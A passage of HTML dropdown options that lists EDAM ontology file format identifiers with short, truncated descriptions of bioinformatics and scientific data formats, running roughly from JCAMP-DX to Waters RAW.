value=\"edam:format_3859\">JCAMP-DX - A standardized file format for data exchange in mass spectrometry, initially...</option>\n <option value=\"edam:format_3579\">JPG - Joint Picture Group file format for lossy graphics file.</option>\n <option value=\"edam:format_3464\">JSON - JavaScript Object Notation format; a lightweight, text-based format to...</option>\n <option value=\"edam:format_3749\">JSON-LD - JSON-LD, or JavaScript Object Notation for Linked Data, is a method of...</option>\n <option value=\"edam:format_3665\">K-mer countgraph - A list of k-mers and their occurences in a dataset. Can also be used as an...</option>\n <option value=\"edam:format_3847\">KGML - The KEGG Markup Language (KGML) is an exchange format of the KEGG pathway...</option>\n <option value=\"edam:format_3765\">KNIME datatable format - Data table formatted such that it can be passed/streamed within the KNIME...</option>\n <option value=\"edam:format_3254\">KRSS2 Syntax - A superset of the Description-Logic Knowledge Representation System...</option>\n <option value=\"edam:format_3817\">latex - format for the LaTeX document preparation system</option>\n <option value=\"edam:format_3014\">LAV - LAV format of alignments generated by BLASTZ and LASTZ.</option>\n <option value=\"edam:format_1337\">lhf - Format of EMBASSY ligand hits file (LHF) of database hits (sequences) with...</option>\n <option value=\"edam:format_3748\">Linked data format - A linked data format enables publishing structured data as linked data...</option>\n <option value=\"edam:format_3728\">LocARNA PP - The LocARNA PP format combines sequence or alignment information and...</option>\n <option value=\"edam:format_3913\">Loom - The Loom file format is based on HDF5, a standard for storing large...</option>\n <option value=\"edam:format_3008\">MAF - Multiple Alignment Format (MAF) supporting alignments of whole genomes with...</option>\n <option value=\"edam:format_3161\">MAGE-ML - MAGE-ML XML format for microarray expression data, standardised by MGED (now...</option>\n <option value=\"edam:format_3162\">MAGE-TAB - MAGE-TAB textual format for microarray expression data, standardised by MGED...</option>\n <option value=\"edam:format_3253\">Manchester OWL Syntax - A syntax for writing OWL class expressions.</option>\n <option value=\"edam:format_3285\">MAP - The MAP file describes SNPs and is used by the Plink package.</option>\n <option value=\"edam:format_2060\">Map format - Format of a map of (typically one) molecular sequence annotated with...</option>\n <option value=\"edam:format_1985\">markx0 - Pearson MARKX0 alignment format.</option>\n <option value=\"edam:format_2922\">markx0 variant - Some variant of Pearson MARKX alignment format.</option>\n <option value=\"edam:format_1986\">markx1 - Pearson MARKX1 alignment format.</option>\n <option value=\"edam:format_1987\">markx10 - Pearson MARKX10 alignment format.</option>\n <option value=\"edam:format_1988\">markx2 - Pearson MARKX2 alignment format.</option>\n <option value=\"edam:format_1989\">markx3 - Pearson MARKX3 alignment format.</option>\n <option value=\"edam:format_3713\">Mascot .dat file - Raw result file from Mascot database search.</option>\n <option value=\"edam:format_1945\">mase format - Mase program sequence format.</option>\n <option value=\"edam:format_3245\">Mass spectrometry data format - Format for mass pectra and derived data, include peptide sequences etc.</option>\n <option value=\"edam:format_3626\">MAT - Binary format used by MATLAB files to store workspace variables.</option>\n <option value=\"edam:format_1990\">match - Alignment format for start and end of matches between sequence pairs.</option>\n <option value=\"edam:format_3033\">Matrix format - Format of a matrix (array) of numerical values.</option>\n <option value=\"edam:format_3714\">MaxQuant APL peaklist format - Format of peak list files from Andromeda search engine (MaxQuant) that...</option>\n <option value=\"edam:format_3777\">MCPD - The FAO/Bioversity/IPGRI Multi-Crop Passport Descriptors (MCPD) is an...</option>\n <option value=\"edam:format_3878\">mdcrd - AMBER trajectory (also called mdcrd), with 10 coordinates per line and...</option>\n <option value=\"edam:format_2194\">medline - Abstract format used by MedLine database.</option>\n <option value=\"edam:format_1735\">Medline Display Format - Format for abstracts of scientific articles from the Medline database.</option>\n <option value=\"edam:format_1991\">mega - Mega format for (typically aligned) sequences.</option>\n <option value=\"edam:format_2923\">mega variant - Some variant of Mega format for (typically aligned) sequences.</option>\n <option value=\"edam:format_1946\">mega-seq - Mega interleaved and non-interleaved sequence format.</option>\n <option value=\"edam:format_1992\">meganon - Mega non-interleaved format for (typically aligned) sequences.</option>\n <option value=\"edam:format_1369\">MEME background Markov model - Format of the model of random sequences used by MEME.</option>\n <option value=\"edam:format_1350\">MEME Dirichlet prior - Dirichlet distribution MEME format.</option>\n <option value=\"edam:format_1360\">meme-motif - A motif in the format generated by the MEME program.</option>\n <option value=\"edam:format_1198\">mf - Chemical structure specified by Molecular Formula (MF), including a count of...</option>\n <option value=\"edam:format_3651\">MGF - Mascot Generic Format. Encodes multiple MS/MS spectra in a single file.</option>\n <option value=\"edam:format_3550\">mhd - Text-based tagged file format for medical images generated using the...</option>\n <option value=\"edam:format_3556\">MHTML - MIME HTML format for Web pages, which can include external resources,...</option>\n <option value=\"edam:format_2056\">Microarray experiment data format - Format for information about a microarray experimental per se (not the data...</option>\n <option value=\"edam:format_1629\">mira - Format of MIRA sequence trace information file.</option>\n <option value=\"edam:format_3864\">mirGFF3 - mirGFF3 is a common format for microRNA data resulting from small-RNA...</option>\n <option value=\"edam:format_1477\">mmCIF - Entry format of PDB database in mmCIF format.</option>\n <option value=\"edam:format_3816\">Mol2 - Complete, portable representation of a SYBYL molecule. ASCII file which...</option>\n <option value=\"edam:format_3815\">Molfile - An MDL Molfile is a file format for holding information about the atoms,...</option>\n <option value=\"edam:format_3849\">MSAML - A set of XML compliant markup components for describing multiple sequence...</option>\n <option value=\"edam:format_3702\">MSF - Proprietary mass-spectrometry format of Thermo Scientific's...</option>\n <option value=\"edam:format_3911\">msh - Mash sketch is a format for sequence / sequence checksum information. To...</option>\n <option value=\"edam:format_1334\">mspcrunch - Format of results of a sequence database search using some variant of...</option>\n <option value=\"edam:format_3916\">MTX - The Matrix Market matrix (MTX) format stores numerical or pattern matrices...</option>\n <option value=\"edam:format_3834\">mzData - Now deprecated data format of the HUPO Proteomics Standards Initiative. ...</option>\n <option value=\"edam:format_3247\">mzIdentML - mzIdentML is the exchange format for peptides and proteins identified from...</option>\n <option value=\"edam:format_3244\">mzML - mzML format for raw spectrometer output data, standardised by HUPO PSI MSS.</option>\n <option value=\"edam:format_3248\">mzQuantML - mzQuantML is the format for quantitation values associated with peptides,...</option>\n <option value=\"edam:format_3681\">mzTab - mzTab is a tab-delimited format for mass spectrometry-based proteomics and...</option>\n <option value=\"edam:format_3654\">mzXML - Common file format for proteomics mass spectrometric data developed at the...</option>\n <option value=\"edam:format_3256\">N-Triples - A plain text serialisation format for RDF (Resource Description Framework)...</option>\n <option value=\"edam:format_1948\">nbrf/pir - NBRF/PIR entry sequence format.</option>\n <option value=\"edam:format_1972\">NCBI format - NCBI FASTA sequence format with NCBI-style IDs.</option>\n <option value=\"edam:format_3650\">netCDF - Format used by netCDF software library for writing and reading...</option>\n <option value=\"edam:format_1910\">newick - Phylogenetic tree Newick (text) format.</option>\n <option value=\"edam:format_3160\">NeXML - NeXML is a standardised XML format for rich phyloinformatic data.</option>\n <option value=\"edam:format_1912\">Nexus format - Phylogenetic tree Nexus (text) format.</option>\n <option value=\"edam:format_1949\">nexus-seq - Nexus/paup interleaved sequence format.</option>\n <option value=\"edam:format_1973\">nexusnon - Nexus/paup non-interleaved sequence format.</option>\n <option value=\"edam:format_3549\">nii - Medical image and metadata format of the Neuroimaging Informatics Technology...</option>\n <option value=\"edam:format_3862\">NLP annotation format - An NLP format used for annotated textual documents.</option>\n <option value=\"edam:format_3863\">NLP corpus format - NLP format used by a specific type of corpus (collection of texts).</option>\n <option value=\"edam:format_3841\">NLP format - Data format used in Natural Language Processing.</option>\n <option value=\"edam:format_3824\">NMR data format - Data format for raw data from a nuclear magnetic resonance (NMR)...</option>\n <option value=\"edam:format_3906\">NMReDATA - MReData is a text based data standard for processed NMR data. It is relying...</option>\n <option value=\"edam:format_3825\">nmrML - nmrML is an MSI supported XML-based open access format for metabolomics NMR...</option>\n <option value=\"edam:format_3257\">Notation3 - A shorthand non-XML serialisation of Resource Description Framework model,...</option>\n <option value=\"edam:format_3551\">nrrd - Nearly Raw Rasta Data format designed to support scientific visualisation...</option>\n <option value=\"edam:format_2061\">Nucleic acid features (primers) format - Format of a report on PCR primers or hybridisation oligos in a nucleic acid...</option>\n <option value=\"edam:format_2158\">Nucleic acid features (restriction sites) format - Format used for report on restriction enzyme recognition sites in nucleotide...</option>\n <option value=\"edam:format_1207\">nucleotide - Alphabet for a nucleotide sequence with possible ambiguity, unknown...</option>\n <option value=\"edam:format_2549\">OBO - OBO ontology text format.</option>\n <option value=\"edam:format_2196\">OBO format - A serialisation format conforming to the Open Biomedical Ontologies (OBO)...</option>\n <option value=\"edam:format_2550\">OBO-XML - OBO ontology XML format.</option>\n <option value=\"edam:format_3727\">OME-TIFF - Image file format used by the Open Microscopy Environment (OME).</option>\n <option value=\"edam:format_2195\">Ontology format - Format used for ontologies.</option>\n <option value=\"edam:format_3784\">Open Annotation format - A format of text annotation using the linked-data Open Annotation Data...</option>\n <option value=\"edam:format_3850\">OrthoXML - OrthoXML is designed broadly to allow the storage and comparison of...</option>\n <option value=\"edam:format_1741\">OSCAR format - OSCAR format of annotated chemical text.</option>\n <option value=\"edam:format_2197\">OWL format - A serialisation format conforming to the Web Ontology Language (OWL) model.</option>\n <option value=\"edam:format_3252\">OWL Functional Syntax - A human-readable encoding for the Web Ontology Language (OWL).</option>\n <option value=\"edam:format_3262\">OWL/XML - OWL ontology XML serialisation format.</option>\n <option value=\"edam:format_1996\">pair - EMBOSS simple sequence pair alignment format.</option>\n <option value=\"edam:format_3601\">pbm - The PBM format is a lowest common denominator monochrome file format. It...</option>\n <option value=\"edam:format_3874\">PCAzip - PCAZip format is a binary compressed file to store atom coordinates based on...</option>\n <option value=\"edam:format_3594\">pcd - Photo CD format, which is the highest resolution format for images on a CD.</option>\n <option value=\"edam:format_1551\">Pcons report format - Format of output of the Pcons Model Quality Assessment Program (MQAP).</option>\n <option value=\"edam:format_3595\">pcx - PCX is an image file format that uses a simple form of run-length encoding....</option>\n <option value=\"edam:format_1476\">PDB - Entry format of PDB database in PDB format.</option>\n <option value=\"edam:format_1475\">PDB database entry format - Format of an entry (or part of an entry) from the PDB database.</option>\n <option value=\"edam:format_1950\">pdbatom - PDB sequence format (ATOM lines).</option>\n <option value=\"edam:format_1951\">pdbatomnuc - PDB nucleotide sequence format (ATOM lines).</option>\n <option value=\"edam:format_1478\">PDBML - Entry format of PDB database in PDBML (XML) format.</option>\n <option value=\"edam:format_1953\">pdbseqres - PDB sequence format (SEQRES lines).</option>\n <option value=\"edam:format_1952\">pdbseqresnuc - PDB nucleotide sequence format (SEQRES lines).</option>\n <option value=\"edam:format_3508\">PDF - Portable Document Format</option>\n <option value=\"edam:format_1954\">Pearson format - Plain old FASTA sequence format (unspecified format for IDs).</option>\n <option value=\"edam:format_3286\">PED - The PED file describes individuals and genetic data and is used by the Plink...</option>\n <option value=\"edam:format_3288\">PED/MAP - The PED/MAP file describes data used by the Plink package.</option>\n <option value=\"edam:format_3655\">pepXML - Open data format for the storage, exchange, and processing of peptide...</option>\n <option value=\"edam:format_3602\">pgm - The PGM format is a lowest common denominator grayscale file format.</option>\n <option value=\"edam:format_3012\">pgSnp - Personal Genome SNP (pgSnp) format for sequence variation tracks (indels and...</option>\n <option value=\"edam:format_1633\">PHD - PHD sequence trace format to store serialised chromatogram data (reads).</option>\n <option value=\"edam:format_1432\">Phylip character frequencies format - PHYLIP file format for phylogenetics character frequency data.</option>\n <option value=\"edam:format_1434\">Phylip cliques format - Format of PHYLIP cliques data.</option>\n <option value=\"edam:format_1430\">Phylip continuous quantitative characters - PHYLIP file format for continuous quantitative character data.</option>\n <option value=\"edam:format_1433\">Phylip discrete states format - Format of PHYLIP discrete states data.</option>\n <option value=\"edam:format_1423\">Phylip distance matrix - Format of PHYLIP phylogenetic distance matrix data.</option>\n <option value=\"edam:format_1997\">PHYLIP format - Phylip format for (aligned) sequences.</option>\n <option value=\"edam:format_2924\">Phylip format variant - Some variant of Phylip format for (aligned) sequences.</option>\n <option value=\"edam:format_1998\">PHYLIP sequential - Phylip non-interleaved format for (aligned) sequences.</option>\n <option value=\"edam:format_1445\">Phylip tree distance format - Format for distances, such as Branch Score distance, between two or more...</option>\n <option value=\"edam:format_1435\">Phylip tree format - Phylogenetic tree data format used by the PHYLIP program.</option>\n <option value=\"edam:format_1425\">Phylip tree raw - Raw data file format used by Phylip from which a phylogenetic tree is...</option>\n <option value=\"edam:format_2036\">Phylogenetic character data format - Format of raw (unplotted) phylogenetic data.</option>\n <option value=\"edam:format_2037\">Phylogenetic continuous quantitative character format - Format of phylogenetic continuous quantitative character data.</option>\n <option value=\"edam:format_2038\">Phylogenetic discrete states format - Format of phylogenetic discrete states data.</option>\n <option value=\"edam:format_2006\">Phylogenetic tree format - Data format for a phylogenetic tree.</option>\n <option value=\"edam:format_2556\">Phylogenetic tree format (text) - Text format for a phylogenetic tree.</option>\n <option value=\"edam:format_2557\">Phylogenetic tree format (XML) - XML format for a phylogenetic tree.</option>\n <option value=\"edam:format_2039\">Phylogenetic tree report (cliques) format - Format of phylogenetic cliques data.</option>\n <option value=\"edam:format_2040\">Phylogenetic tree report (invariants) format - Format of phylogenetic invariants data.</option>\n <option value=\"edam:format_2049\">Phylogenetic tree report (tree distances) format - Format for phylogenetic tree distance data.</option>\n <option value=\"edam:format_3159\">phyloXML - phyloXML is a standardised XML format for phylogenetic trees, networks, and...</option>\n <option value=\"edam:format_3015\">Pileup - Pileup format of alignment of sequences (e.g. sequencing reads) to (a)...</option>\n <option value=\"edam:format_3653\">pkl - Spectral data file similar to dta.</option>\n <option value=\"edam:format_1964\">plain text format (unformatted) - Plain text sequence format (essentially unformatted).</option>\n <option value=\"edam:format_1861\">PlasMapper TextMap - Map of a plasmid (circular DNA) in PlasMapper TextMap format.</option>\n <option value=\"edam:format_1739\">pmc - Article format of the PubMed Central database.</option>\n <option value=\"edam:format_3726\">PMML - PMML uses XML to represent mining models. The structure of the models is...</option>\n <option value=\"edam:format_3603\">PNG - PNG is a file format for image compression.</option>\n <option value=\"edam:format_3330\">PO - EMBOSS simple sequence pair alignment format.</option>\n <option value=\"edam:format_3596\">ppm - The PPM format is a lowest common denominator color image file format.</option>\n <option value=\"edam:format_3838\">pptx - Microsoft Powerpoint format.</option>\n <option value=\"edam:format_3684\">PRIDE XML - PRIDE XML is an XML format for mass spectra, peptide and protein...</option>\n <option value=\"edam:format_1627\">Primer3 primer - Report format on PCR primers and hybridisation oligos as generated by...</option>\n <option value=\"edam:format_3826\">proBAM - . proBAM is an adaptation of BAM (format_2572), which was extended to meet...</option>\n <option value=\"edam:format_3827\">proBED - . proBED is an adaptation of BED (format_3003), which was extended to meet...</option>\n <option value=\"edam:format_1552\">ProQ report format - Format of output of the ProQ protein model quality predictor.</option>\n <option value=\"edam:format_1356\">prosite-pattern - Format of a regular expression pattern from the Prosite database.</option>\n <option value=\"edam:format_1366\">prosite-profile - Sequence profile (sequence classifier) format used in the PROSITE database.</option>\n <option value=\"edam:format_1208\">protein - Alphabet for a protein sequence with possible ambiguity, unknown positions...</option>\n <option value=\"edam:format_3097\">Protein domain classification format - Format of data concerning the classification of the sequences and/or...</option>\n <option value=\"edam:format_2052\">Protein family report format - Format for reports on a protein family.</option>\n <option value=\"edam:format_2054\">Protein interaction format - Format for molecular interaction data.</option>\n <option value=\"edam:format_2062\">Protein report format - Format of a report of general information about a specific protein.</option>\n <option value=\"edam:format_2077\">Protein secondary structure format - Format for secondary structure (predicted or real) of a protein molecule.</option>\n <option value=\"edam:format_2065\">Protein structure report (quality evaluation) format - Format of a report on the quality of a protein three-dimensional model.</option>\n <option value=\"edam:format_3747\">protXML - A format for storage, exchange, and processing of protein identifications...</option>\n <option value=\"edam:format_3696\">PS - PostScript format</option>\n <option value=\"edam:format_3597\">psd - PSD (Photoshop Document) is a proprietary file that allows the user to work...</option>\n <option value=\"edam:format_3851\">PSDML - Tree structure of Protein Sequence Database Markup Language generated using...</option>\n <option value=\"edam:format_3882\">PSF - X-Plor Protein Structure Files (PSF) are structure topology files used by...</option>\n <option value=\"edam:format_3242\">PSI MI TAB (MITAB) - Tabular Molecular Interaction format (MITAB), standardised by HUPO PSI MI.</option>\n <option value=\"edam:format_3158\">PSI MI XML (MIF) - XML Molecular Interaction Format (MIF), standardised by HUPO PSI MI.</option>\n <option value=\"edam:format_3243\">PSI-PAR - Protein affinity format (PSI-PAR), standardised by HUPO PSI MI. It is...</option>\n <option value=\"edam:format_3007\">PSL - PSL format of alignments, typically generated by BLAT or psLayout. Can be...</option>\n <option value=\"edam:format_3781\">PubAnnotation format - JSON format of annotated scientific text used by PubAnnotations and other...</option>\n <option value=\"edam:format_1734\">PubMed citation - Format of bibliographic reference as used by the PubMed database.</option>\n <option value=\"edam:format_3848\">PubMed XML - XML format for collected entries from biobliographic databases MEDLINE and...</option>\n <option value=\"edam:format_3783\">PubTator format - Native textual export format of annotated scientific text from PubTator.</option>\n <option value=\"edam:format_2094\">pure - Alphabet for molecular sequence with possible unknown positions but without...</option>\n <option value=\"edam:format_1215\">pure dna - Alphabet for a DNA sequence with possible ambiguity and unknown positions...</option>\n <option value=\"edam:format_1210\">pure nucleotide - Alphabet for a nucleotide sequence with possible ambiguity and unknown...</option>\n <option value=\"edam:format_1219\">pure protein - Alphabet for any protein sequence with possible ambiguity and unknown...</option>\n <option value=\"edam:format_1217\">pure rna - Alphabet for an RNA sequence with possible ambiguity and unknown positions...</option>\n <option value=\"edam:format_3683\">qcML - qcML is an XML format for quality-related data of mass spectrometry and...</option>\n <option value=\"edam:format_3607\">qual - FASTQ format subset for Phred sequencing quality score data only (no...</option>\n <option value=\"edam:format_3611\">qual454 - FASTQ format subset for Phred sequencing quality score data only (no...</option>\n <option value=\"edam:format_3609\">qualillumina - FASTQ format subset for Phred sequencing quality score data only (no...</option>\n <option value=\"edam:format_3608\">qualsolexa - FASTQ format subset for Phred sequencing quality score data only (no...</option>\n <option value=\"edam:format_3610\">qualsolid - FASTQ format subset for Phred sequencing quality score data only (no...</option>\n <option value=\"edam:format_3787\">Query language - A query language (format) for structured database queries.</option>\n <option value=\"edam:format_1295\">quicktandem - Report format for tandem repeats in a nucleotide sequence (format generated...</option>\n <option value=\"edam:format_3554\">R file format - File format used for scripts written in the R programming language for...</option>\n <option value=\"edam:format_3605\">rast - Sun Raster is a raster graphics file format used on SunOS by Sun Microsystems</option>\n <option value=\"edam:format_1957\">raw - Raw sequence format with no non-sequence characters.</option>\n <option value=\"edam:format_3099\">Raw CATH domain classification format - Format of raw CATH domain classification data files.</option>\n <option value=\"edam:format_3828\">Raw microarray data format - Data format for raw microarray data.</option>\n <option value=\"edam:format_3098\">Raw SCOP domain classification format - Format of raw SCOP domain classification data files.</option>\n <option value=\"edam:format_2571\">Raw sequence format - Format of a raw molecular sequence (i.e. the alphabet used).</option>\n <option value=\"edam:format_3580\">rcc - Reporter Code Count-A data file (.csv) output by the Nanostring nCounter...</option>\n <option value=\"edam:format_2376\">RDF format - A serialisation format conforming to the Resource Description Framework...</option>\n <option value=\"edam:format_3261\">RDF/XML - Resource Description Framework (RDF) XML format.</option>\n <option value=\"edam:format_1320\">REBASE restriction sites - Report format for restriction enzyme recognition sites used by REBASE...</option>\n <option value=\"edam:format_1958\">refseqp - Refseq protein entry sequence format.</option>\n <option value=\"edam:format_3819\">Relaxed PHYLIP Interleaved - Phylip multiple alignment sequence format, less stringent than PHYLIP format.</option>\n <option value=\"edam:format_3820\">Relaxed PHYLIP Sequential - Phylip multiple alignment sequence format, less stringent than PHYLIP...</option>\n <option value=\"edam:format_1319\">restover format - Report format for restriction enzyme recognition sites used by EMBOSS...</option>\n <option value=\"edam:format_1318\">restrict format - Report format for restriction enzyme recognition sites used by EMBOSS...</option>\n <option value=\"edam:format_3600\">rgb - RGB file format is the native raster graphics file format for Silicon...</option>\n <option value=\"edam:format_1213\">rna - Alphabet for an RNA sequence with possible ambiguity, unknown positions and...</option>\n <option value=\"edam:format_3865\">RNA annotation format - A placeholder concept for formats of annotated RNA data, including e.g....</option>\n <option value=\"edam:format_2076\">RNA secondary structure format - Format for secondary structure (predicted or real) of an RNA molecule.</option>\n <option value=\"edam:format_3311\">RNAML - RNA Markup Language.</option>\n <option value=\"edam:format_3485\">RSF - Rich sequence format.</option>\n <option value=\"edam:format_3886\">RST - AMBER coordinate/restart file with 6 coordinates per line and decimal format...</option>\n <option value=\"edam:format_2573\">SAM - Sequence Alignment/Map (SAM) format for alignment of nucleotide sequences...</option>\n <option value=\"edam:format_3813\">SAMPLE file format - The SAMPLE file format contains information about each individual i.e....</option>\n <option value=\"edam:format_1296\">Sanger inverted repeats - Report format for inverted repeats in a nucleotide sequence (format...</option>\n <option value=\"edam:format_3692\">SBGN-ML - SBGN-ML is an XML format for Systems Biology Graphical Notation (SBGN)...</option>\n <option value=\"edam:format_2585\">SBML - Systems Biology Markup Language (SBML), the standard XML format for models...</option>\n <option value=\"edam:format_3725\">SBOL - Synthetic Biology Open Language (SBOL) is an XML format for the...</option>\n <option value=\"edam:format_3155\">SBRML - Systems Biology Result Markup Language (SBRML), the standard XML format for...</option>\n <option value=\"edam:format_3688\">SBtab - SBtab is a tabular format for biochemical network models.</option>\n <option value=\"edam:format_1632\">SCF - Staden Chromatogram Files format (SCF) of base-called sequence reads,...</option>\n <option value=\"edam:format_1999\">scores format - Alignment format for score values for pairs of sequences.</option>\n <option value=\"edam:format_3814\">SDF - SDF is one of a family of chemical-data file formats developed by MDL...</option>\n <option value=\"edam:format_3685\">SED-ML - Simulation Experiment Description Markup Language (SED-ML) is an XML format...</option>\n <option value=\"edam:format_2000\">selex - SELEX format for (aligned) sequences.</option>\n <option value=\"edam:format_2919\">Sequence annotation track format - Format of a sequence annotation track.</option>\n <option value=\"edam:format_2055\">Sequence assembly format - Format for sequence assembly data.</option>\n <option value=\"edam:format_2561\">Sequence assembly format (text) - Text format for sequence assembly data.</option>\n <option value=\"edam:format_2170\">Sequence cluster format - Format used for clusters of molecular sequences.</option>\n <option value=\"edam:format_2172\">Sequence cluster format (nucleic acid) - Format used for clusters of nucleotide sequences.</option>\n <option value=\"edam:format_2171\">Sequence cluster format (protein) - Format used for clusters of protein sequences.</option>\n <option value=\"edam:format_2067\">Sequence distance matrix format - Format of a matrix of genetic distances between molecular sequences.</option>\n <option value=\"edam:format_1920\">Sequence feature annotation format - Data format for molecular sequence feature information.</option>\n <option value=\"edam:format_2548\">Sequence feature table format - Format for a sequence feature table.</option>\n <option value=\"edam:format_2206\">Sequence feature table format (text) - Text format for a sequence feature table.</option>\n <option value=\"edam:format_2553\">Sequence feature table format (XML) - XML format for a sequence feature table.</option>\n <option value=\"edam:format_2155\">Sequence features (repeats) format - Format used for map of repeats in molecular (typically nucleotide) sequences.</option>\n <option value=\"edam:format_2068\">Sequence motif format - Format of a sequence motif.</option>\n <option value=\"edam:format_2069\">Sequence profile format - Format of a sequence profile.</option>\n <option value=\"edam:format_3606\">Sequence quality report format (text) - Textual report format for sequence quality for reports from sequencing...</option>\n <option value=\"edam:format_2078\">Sequence range format - Format used to specify range(s) of sequence positions.</option>\n <option value=\"edam:format_1919\">Sequence record format - Data format for a molecular sequence record.</option>\n <option value=\"edam:format_2551\">Sequence record format (text) - Data format for a molecular sequence record.</option>\n <option value=\"edam:format_2552\">Sequence record format (XML) - Data format for a molecular sequence record.</option>\n <option value=\"edam:format_2057\">Sequence trace format - Format for sequence trace data (i.e. including base call information).</option>\n <option value=\"edam:format_2921\">Sequence variation annotation format - Format of sequence variation annotation.</option>\n <option value=\"edam:format_1419\">Sequence-MEME profile alignment - Format for alignment of molecular sequences to MEME profiles...</option>\n <option value=\"edam:format_2014\">Sequence-profile alignment format - Data format for a sequence-profile alignment.</option>\n <option value=\"edam:format_3758\">SEQUEST .out file - Raw result file from SEQUEST database search.</option>\n <option value=\"edam:format_3701\">Sequin format - A five-column, tab-delimited table of feature locations and qualifiers for...</option>\n <option value=\"edam:format_3852\">SeqXML - SeqXML is an XML Schema to describe biological sequences, developed by the...</option>\n <option value=\"edam:format_3284\">SFF - Standard flowgram format (SFF) is a binary file format used to encode...</option>\n <option value=\"edam:format_3619\">sif - SIF (simple interaction file) Format - a network/pathway format used for...</option>\n <option value=\"edam:format_1200\">smarts - SMILES ARbitrary Target Specification (SMARTS) format for chemical structure...</option>\n <option value=\"edam:format_1196\">SMILES - Chemical structure specified in Simplified Molecular Input Line Entry System...</option>\n <option value=\"edam:format_1335\">Smith-Waterman format - Format of results of a sequence database search using some variant of Smith...</option>\n <option value=\"edam:format_3624\">snpeffdb - An index of a genome database, indexed for use by the snpeff tool.</option>\n <option value=\"edam:format_3790\">SPARQL - SPARQL (SPARQL Protocol and RDF Query Language) is a semantic query language...</option>\n <option value=\"edam:format_3250\">spML - spML is the format for describing proteomics sample processing, other than...</option>\n <option value=\"edam:format_3555\">SPSS - File format used for scripts for the Statistical Package for the Social...</option>\n <option value=\"edam:format_3788\">SQL - SQL (Structured Query Language) is the de-facto standard query language...</option>\n <option value=\"edam:format_3621\">SQLite format - Data format used by the SQLite database.</option>\n <option value=\"edam:format_3698\">SRA format - SRA archive format (SRA) is the archive format used for input to the NCBI...</option>\n <option value=\"edam:format_3017\">SRF - Sequence Read Format (SRF) of sequence trace data. Supports submission to...</option>\n <option value=\"edam:format_2002\">srs format - Simple multiple sequence (alignment) format for SRS.</option>\n <option value=\"edam:format_2003\">srspair - Simple sequence pair (alignment) format for SRS.</option>\n <option value=\"edam:format_3310\">SS - XRNA old input style format.</option>\n <option value=\"edam:format_1928\">Staden experiment format - Staden experiment file format.</option>\n <option value=\"edam:format_1960\">Staden format - Staden suite sequence format.</option>\n <option value=\"edam:format_1961\">Stockholm format - Stockholm multiple sequence alignment format (used by Pfam and Rfam).</option>\n <option value=\"edam:format_1962\">strider format - DNA strider output sequence format.</option>\n <option value=\"edam:format_2304\">STRING entry format (XML) - Entry format (XML) for the STRING database of protein interaction.</option>\n <option value=\"edam:format_3604\">SVG - Scalable Vector Graphics (SVG) is an XML-based vector image format for...</option>\n <option value=\"edam:format_2004\">T-Coffee format - T-Coffee program alignment format.</option>\n <option value=\"edam:format_3616\">tabix - TAB-delimited genome position file index format.</option>\n <option value=\"edam:format_3700\">Tabix index file format - Index file format used by the samtools package to index TAB-delimited genome...</option>\n <option value=\"edam:format_1665\">Taverna workflow format - Format of Taverna workflows.</option>\n <option value=\"edam:format_2033\">Tertiary structure format - Data format for a molecular tertiary structure.</option>\n <option value=\"edam:format_2021\">Text mining report format - Data format of a report from text mining.</option>\n <option value=\"edam:format_2330\">Textual format - Textual format.</option>\n <option value=\"edam:format_3712\">Thermo RAW - Proprietary file format for mass spectrometry data from Thermo Scientific.</option>\n <option value=\"edam:format_3835\">TIDE TXT - Format supported by the Tide tool for identifying peptides from tandem mass...</option>\n <option value=\"edam:format_3591\">TIFF - A versatile bitmap format.</option>\n <option value=\"edam:format_3876\">TNG - Trajectory Next Generation (TNG) is a format for storage of molecular...</option>\n <option value=\"edam:format_3879\">Topology format - Format of topology files; containing the static information of a structure...</option>\n <option value=\"edam:format_3866\">Trajectory format - File format to store trajectory information for a 3D structure .</option>\n <option value=\"edam:format_3867\">Trajectory format (binary) - Binary file format to store trajectory information for a 3D structure .</option>\n <option value=\"edam:format_3868\">Trajectory format (text) - Textual file format to store trajectory information for a 3D structure .</option>\n <option value=\"edam:format_3246\">TraML - TraML (Transition Markup Language) is the format for mass spectrometry...</option>\n <option value=\"edam:format_1436\">TreeBASE format - The format of an entry from the TreeBASE database of phylogenetic data.</option>\n <option value=\"edam:format_1911\">TreeCon format - Phylogenetic tree TreeCon (text) format.</option>\n <option value=\"edam:format_2005\">TreeCon-seq - Treecon format for (aligned) sequences.</option>\n <option value=\"edam:format_1437\">TreeFam format - The format of an entry from the TreeFam database of phylogenetic data.</option>\n <option value=\"edam:format_3910\">trr - Format of trr files that contain the trajectory of a simulation experiment...</option>\n <option value=\"edam:format_3475\">TSV - Tabular data represented as tab-separated values in a text file.</option>\n <option value=\"edam:format_3255\">Turtle - The Terse RDF Triple Language (Turtle) is a human-friendly serialisation...</option>\n <option value=\"edam:format_1206\">unambiguous pure - Alphabet for a molecular sequence with possible unknown positions but...</option>\n <option value=\"edam:format_1214\">unambiguous pure dna - Alphabet for a DNA sequence (characters ACGT only) with possible unknown...</option>\n <option value=\"edam:format_1211\">unambiguous pure nucleotide - Alphabet for a nucleotide sequence (characters ACGTU only) with possible...</option>\n <option value=\"edam:format_1218\">unambiguous pure protein - Alphabet for any protein sequence with possible unknown positions but...</option>\n <option value=\"edam:format_1216\">unambiguous pure rna sequence - Alphabet for an RNA sequence (characters ACGU only) with possible unknown...</option>\n <option value=\"edam:format_2096\">unambiguous sequence - Alphabet for a molecular sequence with possible unknown positions but...</option>\n <option value=\"edam:format_3853\">UniParc XML - XML format for the UniParc database.</option>\n <option value=\"edam:format_2187\">UniProt-like (text) - A text sequence format resembling uniprotkb entry format.</option>\n <option value=\"edam:format_1963\">UniProtKB format - UniProtKB entry sequence format.</option>\n <option value=\"edam:format_3771\">UniProtKB RDF - UniProtKB RDF sequence features format is an RDF format available for...</option>\n <option value=\"edam:format_3770\">UniProtKB XML - UniProtKB XML sequence features format is an XML format available for...</option>\n <option value=\"edam:format_2547\">uniprotkb-like format - A sequence format resembling uniprotkb entry format.</option>\n <option value=\"edam:format_3854\">UniRef XML - XML format for the UniRef reference clusters.</option>\n <option value=\"edam:format_2095\">unpure - Alphabet for a molecular sequence with possible unknown positions but...</option>\n <option value=\"edam:format_3016\">VCF - Variant Call Format (VCF) for sequence variation (indels, polymorphisms,...</option>\n <option value=\"edam:format_3699\">VDB - VDB ('vertical database') is the native format used for export from the NCBI...</option>\n <option value=\"edam:format_1458\">Vienna local RNA secondary structure format - Format of local RNA secondary structure components with free energy values,...</option>\n <option value=\"edam:format_3821\">VisML - Default XML format of VisANT, containing all the network information.</option>\n <option value=\"edam:format_3858\">Waters RAW - Proprietary file format for mass spectrometry 